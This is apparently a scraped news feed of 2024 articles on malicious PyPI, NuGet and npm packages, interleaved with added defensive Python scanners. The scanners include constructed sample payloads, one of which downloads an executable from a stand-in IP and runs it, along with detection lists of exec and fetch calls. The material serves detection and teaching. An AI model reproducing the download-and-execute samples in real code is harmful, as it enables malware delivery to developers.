Package – INDIA NEWS (https://www.indiavpn.org)

PyPI Halts Sign-Ups Amid Surge of Malicious Package Uploads Targeting Developers
https://www.indiavpn.org/2024/03/29/pypi-halts-sign-ups-amid-surge-of-malicious-package-uploads-targeting-developers/
Fri, 29 Mar 2024 06:39:23 +0000

Mar 29, 2024 | Newsroom | Supply Chain Attack / Threat Intelligence

The maintainers of the Python Package Index (PyPI) repository briefly suspended new user sign-ups following an influx of malicious projects uploaded as part of a typosquatting campaign.

PyPI said “new project creation and new user registration” was temporarily halted to mitigate what it described as a “malware upload campaign.” The suspension was lifted about 10 hours later, on March 28, 2024, at 12:56 p.m. UTC.

Software supply chain security firm Checkmarx said the as-yet-unidentified threat actors flooding the repository targeted developers with typosquatted versions of popular packages.

“This is a multi-stage attack and the malicious payload aimed to steal crypto wallets, sensitive data from browsers (cookies, extensions data, etc.), and various credentials,” researchers Yehuda Gelb, Jossef Harush Kadouri, and Tzachi Zornstain said. “In addition, the malicious payload employed a persistence mechanism to survive reboots.”

The findings were also corroborated independently by Mend.io, which noted that it detected more than 100 malicious packages targeting machine learning (ML) libraries such as PyTorch, Matplotlib, and Selenium.

The development comes as open-source repositories are increasingly becoming an attack vector for threat actors to infiltrate enterprise environments.

Typosquatting is a well-documented attack technique in which adversaries upload packages with names closely resembling their legitimate counterparts (e.g., Matplotlib vs. Matplotlig or tensorflow vs. tensourflow) in order to trick unsuspecting users into downloading them.

These deceptive variants – totalling over 500 packages, per Check Point – were uploaded starting March 26, 2024, each from a separate account, suggesting that the whole process was automated.

“The decentralized nature of the uploads, with each package attributed to a different user, complicates efforts to cross-identify these malicious entries,” the Israeli cybersecurity company said.

Cybersecurity firm Phylum, which has also been tracking the same campaign, said the attackers published –

  • 67 variations of requirements
  • 38 variations of Matplotlib
  • 36 variations of requests
  • 35 variations of colorama
  • 29 variations of tensorflow
  • 28 variations of selenium
  • 26 variations of BeautifulSoup
  • 26 variations of PyTorch
  • 20 variations of pillow
  • 15 variations of asyncio

The packages, for their part, check whether the installer’s operating system is Windows and, if so, download and execute an obfuscated payload retrieved from an actor-controlled domain (“funcaptcha[.]ru”).

The malware functions as a stealer, exfiltrating files, Discord tokens, as well as data from web browsers and cryptocurrency wallets to the same server. It further attempts to download a Python script (“hvnc.py”) to the Windows Startup folder for persistence.

The development once again illustrates the escalating risk posed by software supply chain attacks, making it crucial that developers scrutinize every third-party component before trusting it with their environment.

This is not the first time PyPI has resorted to such a measure. In May 2023, it temporarily disabled user sign-ups after finding that the “volume of malicious users and malicious projects being created on the index in the past week has outpaced our ability to respond to it in a timely fashion.”

PyPI suspended new user registrations a second time last year, on December 27, for similar reasons. The restriction was lifted on January 2, 2024.

Malicious NuGet Package Linked to Industrial Espionage Targets Developers
https://www.indiavpn.org/2024/03/26/malicious-nuget-package-linked-to-industrial-espionage-targets-developers/
Tue, 26 Mar 2024 18:32:09 +0000

Mar 26, 2024 | Newsroom | Industrial Espionage / Threat Intelligence

Threat hunters have identified a suspicious package in the NuGet package manager that is likely designed to target developers working with tools made by a Chinese firm specializing in industrial and digital equipment manufacturing.

The package in question is SqzrFramework480, which ReversingLabs said was first published on January 24, 2024. It has been downloaded 2,999 times as of writing.

The software supply chain security firm said it did not find any other package that exhibited similar behavior.

It did, however, theorize that the package could be used to orchestrate industrial espionage on systems equipped with cameras, machine vision, and robotic arms.

The indication that SqzrFramework480 is tied to a Chinese firm named Bozhon Precision Industry Technology Co., Ltd. comes from the use of a version of the company’s logo as the package’s icon. It was uploaded by a NuGet user account called “zhaoyushun1999.”

Present within the library is a DLL file, “SqzrFramework480.dll,” with the ability to take screenshots, ping a remote IP address every 30 seconds until the operation succeeds, and transmit the screenshots over a socket connected to that IP address.

“None of those behaviors are resolutely malicious. However, when taken together, they raise alarms,” security researcher Petar Kirhmajer said. “The ping serves as a heartbeat check to see if the exfiltration server is alive.”

The malicious use of sockets for data communication and exfiltration has been observed in the wild previously, as in the case of the npm package nodejs_net_server.

The exact motive behind the package is unclear as yet, although adversaries are known to conceal nefarious code in seemingly benign software to compromise victims.

An alternate, innocuous explanation could be that the package was leaked by a developer or a third party that works with the company.

“They may also explain seemingly malicious continuous screen capture behavior: it could simply be a way for a developer to stream images from the camera on the main monitor to a worker station,” Kirhmajer said.

The ambiguity surrounding the package aside, the findings underscore the complicated nature of supply chain threats, making it imperative that users scrutinize libraries prior to downloading them.

“Open-source repositories like NuGet are increasingly hosting suspicious and malicious packages designed to attract developers and trick them into downloading and incorporating malicious libraries and other modules into their development pipelines,” Kirhmajer said.

Dormant PyPI Package Compromised to Spread Nova Sentinel Malware
https://www.indiavpn.org/2024/02/23/dormant-pypi-package-compromised-to-spread-nova-sentinel-malware/
Fri, 23 Feb 2024 19:53:54 +0000

Feb 23, 2024 | Newsroom | Supply Chain Attack / Malware

A dormant package on the Python Package Index (PyPI) repository was updated after nearly two years to propagate an information stealer called Nova Sentinel.

The package, named django-log-tracker, was first published to PyPI in April 2022, according to software supply chain security firm Phylum, which detected an anomalous update to the library on February 21, 2024.

While the linked GitHub repository hasn’t been updated since April 10, 2022, the introduction of a malicious update suggests a likely compromise of the PyPI account belonging to the developer.

django-log-tracker has been downloaded 3,866 times to date, with the rogue version (1.0.4) downloaded 107 times on the day it was published. The package is no longer available for download from PyPI.

“In the malicious update, the attacker stripped the package of most of its original content, leaving only an __init__.py and example.py file behind,” the company said.

The changes, simple and self-explanatory, involve fetching an executable named “Updater_1.4.4_x64.exe” from a remote server (“45.88.180[.]54”) and launching it with the Python os.startfile() function.
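Both this update and the funcaptcha[.]ru campaign described earlier reduce to the same shape: an operating-system check, a fetch from a hard-coded host, and a call that executes the result. The following added example (not Phylum’s tooling or anything from the article) walks the Python AST of a package module and reports that combination. The sample module is constructed, and its host is an RFC 5737 documentation address rather than the server named above.

```python
import ast
import re
from dataclasses import dataclass

# Call names that fetch, decode or execute something. Import aliases
# ("from os import startfile") are not resolved here; a production scanner
# would track the import table as well.
DOWNLOAD_CALLS = {"urllib.request.urlopen", "urllib.request.urlretrieve",
                  "requests.get", "requests.post", "urllib.urlopen"}
EXEC_CALLS = {"os.startfile", "os.system", "os.popen", "subprocess.run",
              "subprocess.call", "subprocess.Popen", "exec", "eval"}
DECODE_CALLS = {"base64.b64decode", "zlib.decompress", "marshal.loads"}
OS_GATES = {"platform.system", "os.name", "sys.platform"}

# A string literal that is a URL or a bare IPv4 address, optionally with port/path.
REMOTE_LITERAL = re.compile(r"^(https?://\S+|(\d{1,3}\.){3}\d{1,3}(:\d+)?(/\S*)?)$")


@dataclass
class Finding:
    line: int
    kind: str
    detail: str


def dotted_name(node):
    """Render a Name/Attribute chain such as os.path.join as a string, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_source(src, filename="<string>"):
    """Walk the module AST and collect download / execute / decode calls,
    remote address literals and operating-system gates."""
    findings = []
    for node in ast.walk(ast.parse(src, filename)):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name in DOWNLOAD_CALLS:
                findings.append(Finding(node.lineno, "download", name))
            elif name in EXEC_CALLS:
                findings.append(Finding(node.lineno, "execute", name))
            elif name in DECODE_CALLS:
                findings.append(Finding(node.lineno, "decode", name))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if REMOTE_LITERAL.match(node.value.strip()):
                findings.append(Finding(node.lineno, "remote", node.value))
        elif isinstance(node, (ast.Attribute, ast.Name)):
            name = dotted_name(node)
            if name in OS_GATES:
                findings.append(Finding(node.lineno, "os-gate", name))
    return sorted(findings, key=lambda f: f.line)


def verdict(findings):
    """Collapse findings into one label; the combination matters more than
    any single call, since a legitimate package may download or spawn."""
    kinds = {f.kind for f in findings}
    if {"download", "execute"} <= kinds:
        return "download-and-execute"
    if {"decode", "execute"} <= kinds:
        return "decode-and-execute"
    if kinds & {"download", "execute", "remote"}:
        return "suspicious"
    return "clean"


# Constructed stand-in for the kind of __init__.py the text describes. The
# host is a documentation address (RFC 5737), not the server named above.
CONSTRUCTED_INIT = '''\
import os
import platform
import urllib.request

if platform.system() == "Windows":
    url = "http://203.0.113.10/Updater.exe"
    target = os.path.join(os.environ["TEMP"], "Updater.exe")
    urllib.request.urlretrieve(url, target)
    os.startfile(target)
'''

CONSTRUCTED_BENIGN = "import json\n\ndef dump(obj):\n    return json.dumps(obj, sort_keys=True)\n"

if __name__ == "__main__":
    hits = scan_source(CONSTRUCTED_INIT, "__init__.py")
    for f in hits:
        print(f"line {f.line:3d}  {f.kind:9s} {f.detail}")
    print("verdict:", verdict(hits))
```

Matching by dotted name keeps the scanner small, but it means `from os import startfile` or `getattr(os, "start" + "file")` slip through. Treat the verdict as a triage signal for which release to diff by hand, not as proof that a version is clean.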

The binary, for its part, comes embedded with Nova Sentinel, a stealer malware that was first documented by Sekoia in November 2023 as being distributed in the form of fake Electron apps on bogus sites offering video game downloads.

“What’s interesting about this particular case […] is that the attack vector appeared to be an attempted supply-chain attack via a compromised PyPI account,” Phylum said.

“If this had been a really popular package, any project with this package listed as a dependency without a version specified or a flexible version specified in their dependency file would have pulled the latest, malicious version of this package.”
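Phylum’s closing point is about dependency specifiers. The added example below (not from Phylum or the article) classifies each line of a requirements file as pinned, floating or unpinned, notes whether a --hash is present, and evaluates whether a given specifier would have admitted a new release such as 1.0.4. Version handling is simplified to dotted integers, which is an assumption (pre-releases, epochs and local labels are out of scope), and the requirements file is constructed.

```python
import re

# Version clauses in the subset of PEP 440 handled here. Assumption: versions
# are dotted integers; pre-release, post-release, epoch and local-label
# handling is out of scope for this illustration.
CLAUSE = re.compile(r"(===|==|!=|<=|>=|~=|<|>)\s*([0-9][0-9.]*\*?)")
NAME = re.compile(r"^([A-Za-z0-9][A-Za-z0-9._-]*)\s*(\[[^\]]*\])?\s*(.*)$")


def parse_version(v):
    return tuple(int(p) for p in v.strip(".").split("."))


def pad(a, b):
    """Right-pad the shorter tuple with zeros so 1.0 and 1.0.0 compare equal."""
    n = max(len(a), len(b))
    return a + (0,) * (n - len(a)), b + (0,) * (n - len(b))


def clause_admits(op, spec, version):
    """True when one clause such as ('>=', '1.0.1') admits the version tuple."""
    if spec.endswith("*"):                      # ==1.0.* prefix match
        prefix = parse_version(spec[:-1])
        v, _ = pad(version, prefix)
        match = v[:len(prefix)] == prefix
        return match if op == "==" else not match
    s = parse_version(spec)
    k = len(s)
    v, s = pad(version, s)
    if op in ("==", "==="):
        return v == s
    if op == "!=":
        return v != s
    if op == "<=":
        return v <= s
    if op == ">=":
        return v >= s
    if op == "<":
        return v < s
    if op == ">":
        return v > s
    if op == "~=":  # compatible release: at least spec, same prefix up to its last part
        return v >= s and v[:k - 1] == s[:k - 1]
    raise ValueError(op)


def spec_admits(spec_string, version_string):
    """Would pip accept version_string for this specifier? An empty
    specifier admits everything, which is exactly the problem."""
    version = parse_version(version_string)
    return all(clause_admits(op, s, version) for op, s in CLAUSE.findall(spec_string))


def classify(spec_string):
    clauses = CLAUSE.findall(spec_string)
    if not clauses:
        return "unpinned"
    if any(op in ("==", "===") and not s.endswith("*") for op, s in clauses):
        return "pinned"
    return "floating"


def logical_lines(text):
    """Join backslash-continued lines, as written by pip-compile --generate-hashes."""
    buf = ""
    for raw in text.splitlines():
        if raw.rstrip().endswith("\\"):
            buf += raw.rstrip()[:-1] + " "
            continue
        yield buf + raw
        buf = ""
    if buf:
        yield buf


def audit_requirements(text):
    """One record per requirement: name, specifier, pin class, hash present."""
    records = []
    for line in logical_lines(text):
        line = line.split("#", 1)[0].strip()
        if not line or line.startswith("-"):      # blank, or an option line such as -r
            continue
        m = NAME.match(line)
        if not m:
            continue
        name, _extras, rest = m.groups()
        spec = rest.split("--hash", 1)[0].split(";", 1)[0].strip()
        records.append({"name": name, "spec": spec,
                        "pin": classify(spec), "hashed": "--hash=" in rest})
    return records


# Constructed requirements file; the digest is a placeholder, not a real hash.
CONSTRUCTED_REQUIREMENTS = """\
django-log-tracker>=1.0.1      # floating: every later release is fair game
requests                       # unpinned: any version at all
numpy==1.26.4 \\
    --hash=sha256:0000000000000000000000000000000000000000000000000000000000000000
pillow~=10.2                   # compatible release, still floats within 10.x
"""

if __name__ == "__main__":
    for r in audit_requirements(CONSTRUCTED_REQUIREMENTS):
        print(f"{r['name']:20s} {r['pin']:9s} hashed={r['hashed']}  admits 1.0.4: "
              f"{spec_admits(r['spec'], '1.0.4')}")
```

With `pip install --require-hashes`, pip refuses any requirement that lacks a digest once a single `--hash` appears, so the pinned-and-hashed entry is the only one that could not have pulled a surprise release like the one described above.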

CISA and OpenSSF Release Framework for Package Repository Security
https://www.indiavpn.org/2024/02/12/cisa-and-openssf-release-framework-for-package-repository-security/
Mon, 12 Feb 2024 15:43:57 +0000

Feb 12, 2024 | The Hacker News | Infrastructure Security / Software Supply Chain

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) announced that it’s partnering with the Open Source Security Foundation (OpenSSF) Securing Software Repositories Working Group to publish a new framework to secure package repositories.

Called the Principles for Package Repository Security, the framework aims to establish a set of foundational rules for package managers and further harden open-source software ecosystems.

“Package repositories are at a critical point in the open-source ecosystem to help prevent or mitigate such attacks,” OpenSSF said.

“Even simple actions like having a documented account recovery policy can lead to robust security improvements. At the same time, capabilities must be balanced with resource constraints of package repositories, many of which are operated by non-profit organizations.”

Notably, the principles lay out four security maturity levels for package repositories across four categories: authentication, authorization, general capabilities, and command-line interface (CLI) tooling –

  • Level 0 – Having very little security maturity
  • Level 1 – Having basic security maturity, such as multi-factor authentication (MFA) and allowing security researchers to report vulnerabilities
  • Level 2 – Having moderate security, which includes actions like requiring MFA for critical packages and warning users of known security vulnerabilities
  • Level 3 – Having advanced security, which requires MFA for all maintainers and supports build provenance for packages

All package management ecosystems should be working towards at least Level 1, the framework authors Jack Cable and Zach Steindler note.

The ultimate objective is to allow package repositories to self-assess their security maturity and formulate a plan to bolster their guardrails over time in the form of security improvements.

“Security threats change over time, as do the security capabilities that address those threats,” OpenSSF said. “Our goal is to help package repositories more quickly deliver the security capabilities that best help strengthen the security of their ecosystems.”

The development comes as the U.S. Department of Health and Human Services’ Health Sector Cybersecurity Coordination Center (HC3) warned of security risks arising as a result of using open-source software for maintaining patient records, inventory management, prescriptions, and billing.

“While open-source software is the bedrock of modern software development, it is also often the weakest link in the software supply chain,” it said in a threat brief published in December 2023.

Npm Trojan Bypasses UAC, Installs AnyDesk with “Oscompatible” Package
https://www.indiavpn.org/2024/01/19/npm-trojan-bypasses-uac-installs-anydesk-with-oscompatible-package/
Fri, 19 Jan 2024 09:42:17 +0000

Jan 19, 2024 | Newsroom | Software Security / Spyware

A malicious package uploaded to the npm registry has been found deploying a sophisticated remote access trojan on compromised Windows machines.

The package, named “oscompatible,” was published on January 9, 2024, attracting a total of 380 downloads before it was taken down.

oscompatible included a “few strange binaries,” according to software supply chain security firm Phylum, including a single executable file, a dynamic-link library (DLL) and an encrypted DAT file, alongside a JavaScript file.

This JavaScript file (“index.js”) executes an “autorun.bat” batch script but only after running a compatibility check to determine if the target machine runs on Microsoft Windows.

If the platform is not Windows, it displays an error message to the user, stating the script is running on Linux or an unrecognized operating system, urging them to run it on “Windows Server OS.”

The batch script, for its part, checks whether it has administrator privileges and, if not, runs a legitimate Microsoft Edge component called “cookie_exporter.exe” via a PowerShell command.

Attempting to run the binary will trigger a User Account Control (UAC) prompt asking the target to execute it with administrator credentials.

If the user approves the prompt, the next stage runs with elevated privileges: the legitimate Edge binary loads the attacker’s DLL (“msedge.dll”) through DLL search order hijacking.

The trojanized version of the library is designed to decrypt the DAT file (“msedge.dat”) and launch another DLL called “msedgedat.dll,” which, in turn, establishes connections with an actor-controlled domain named “kdark1[.]com” to retrieve a ZIP archive.

The ZIP file comes fitted with the AnyDesk remote desktop software as well as a remote access trojan (“verify.dll”) that’s capable of fetching instructions from a command-and-control (C2) server via WebSockets and gathering sensitive information from the host.

It also “installs Chrome extensions to Secure Preferences, configures AnyDesk, hides the screen, and disables shutting down Windows, [and] captures keyboard and mouse events,” Phylum said.
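The artefact mix Phylum describes (a PE executable, a DLL, an encrypted DAT and a platform-gated script inside what should be a JavaScript package) is easy to screen for before a package reaches a build. The following added example, not Phylum’s code or anything from the article, builds a constructed npm-style tarball with that layout and scans it. The postinstall hook in the constructed package.json is an assumption about how index.js might be invoked, not a detail the article gives.

```python
import io
import json
import tarfile

PE_MAGIC = b"MZ"          # DOS/PE header present in every .exe and .dll
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
SCRIPT_SUFFIXES = (".bat", ".cmd", ".ps1", ".vbs")


def build_constructed_package():
    """Build an in-memory npm-style tarball with the file layout the text
    describes. Constructed for this example; the postinstall hook is an
    assumption about how index.js might be triggered, not something the
    article states."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        def add(name, data):
            info = tarfile.TarInfo("package/" + name)   # npm tarballs nest under package/
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
        add("package.json", json.dumps({
            "name": "example-compat", "version": "1.0.0",
            "scripts": {"postinstall": "node index.js"}}).encode())
        add("index.js", b'if (process.platform !== "win32") {\n'
                        b'  console.error("run on Windows Server OS"); process.exit(1);\n}\n'
                        b'require("child_process").execSync("autorun.bat");\n')
        add("autorun.bat", b"@echo off\r\n")
        add("cookie_exporter.exe", PE_MAGIC + b"\x90\x00" * 30)
        add("msedge.dll", PE_MAGIC + b"\x90\x00" * 30)
        add("msedge.dat", bytes(range(256)))
    return buf.getvalue()


def scan_npm_tarball(data):
    """Return (kind, detail) findings for artefacts that have no business in
    a JavaScript package: PE binaries, Windows scripts, opaque blobs,
    platform-gated process spawning, and lifecycle hooks that run code at
    install time."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tar:
        for member in tar.getmembers():
            if not member.isfile():
                continue
            content = tar.extractfile(member).read()
            name = member.name.split("/", 1)[-1]
            lower = name.lower()
            if name == "package.json":
                scripts = json.loads(content).get("scripts", {})
                for hook in LIFECYCLE_HOOKS:
                    if hook in scripts:
                        findings.append(("lifecycle-script", f"{hook}: {scripts[hook]}"))
            elif content[:2] == PE_MAGIC:
                findings.append(("pe-binary", name))
            elif lower.endswith(SCRIPT_SUFFIXES):
                findings.append(("windows-script", name))
            elif lower.endswith((".dat", ".bin")):
                findings.append(("opaque-blob", name))
            elif lower.endswith(".js") and b"process.platform" in content \
                    and b"child_process" in content:
                findings.append(("platform-gated-exec", name))
    return findings


if __name__ == "__main__":
    for kind, detail in scan_npm_tarball(build_constructed_package()):
        print(f"{kind:20s} {detail}")
```

Checking the PE magic rather than the file extension matters because a binary renamed to `.node` or `.dat` still has the `MZ` header; the extension checks only catch what the attacker did not bother to disguise. Running this against a tarball fetched with `npm pack` lets you review the artefacts before any install script has had a chance to run.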

While “oscompatible” appears to be the only npm module employed as part of the campaign, the development is once again a sign that threat actors are increasingly targeting open-source software (OSS) ecosystems for supply chain attacks.

“From the binary side, the process of decrypting data, using a revoked certificate for signing, pulling other files from remote sources, and attempting to disguise itself as a standard Windows update process all along the way is relatively sophisticated compared to what we normally see in OSS ecosystems,” the company said.

The disclosure comes as cloud security firm Aqua revealed that 21.2% of the top 50,000 most downloaded npm packages are deprecated, exposing users to security risks. Those deprecated packages are downloaded an estimated 2.1 billion times weekly.

The figure includes packages whose associated GitHub repositories are archived or deleted, as well as packages maintained without a visible repository, commit history, or issue tracker.

“This situation becomes critical when maintainers, instead of addressing security flaws with patches or CVE assignments, opt to deprecate affected packages,” security researchers Ilay Goldman and Yakir Kadkoda said.

“What makes this particularly concerning is that, at times, these maintainers do not officially mark the package as deprecated on npm, leaving a security gap for users who may remain unaware of potential threats.”
